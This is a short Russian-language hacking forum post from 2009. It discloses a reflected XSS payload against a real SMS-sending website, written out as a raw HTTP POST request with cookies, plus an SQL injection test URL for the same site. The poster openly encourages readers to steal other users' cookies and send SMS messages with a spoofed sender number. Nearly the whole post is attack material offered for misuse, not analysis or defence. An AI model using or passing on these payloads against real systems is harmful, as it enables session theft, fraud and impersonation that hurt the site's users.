07.03.2009, 09:32
|
|
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами:
9382468
Репутация:
104
|
|
Нашол XSS.Куки у кого нибуть своруете и отпровляйте смс с подменой номера.
Код HTML:
POST http://websms.ru:80/login.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: websms.ru
Content-Length: 112
Cookie: ASPSESSIONIDSATBBARR=HGLKKOKAMEMAAHADHJMFGPNJ;websms0=WindBook=0&Shema=0;__utma=177195445.3406579783414500300.1236403094.1236403094.1236403094.1;__utmb=177195445.0.10.1236403094;__utmc=177195445;__utmz=177195445.1236403094.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: Close
Pragma: no-cache
AvtoLogin=1>"><ScRiPt%20%0a%0d>alert()%3B</ScRiPt>&Login=TreV@N&Pass=&Cook=on®=%C2%D5%CE%C4
SQL injection
Код HTML:
http://websms.ru/avtosms.asp?Day=0&Month=1&Year='
Последний раз редактировалось TreV@N; 07.03.2009 в 09:58..
|
|
|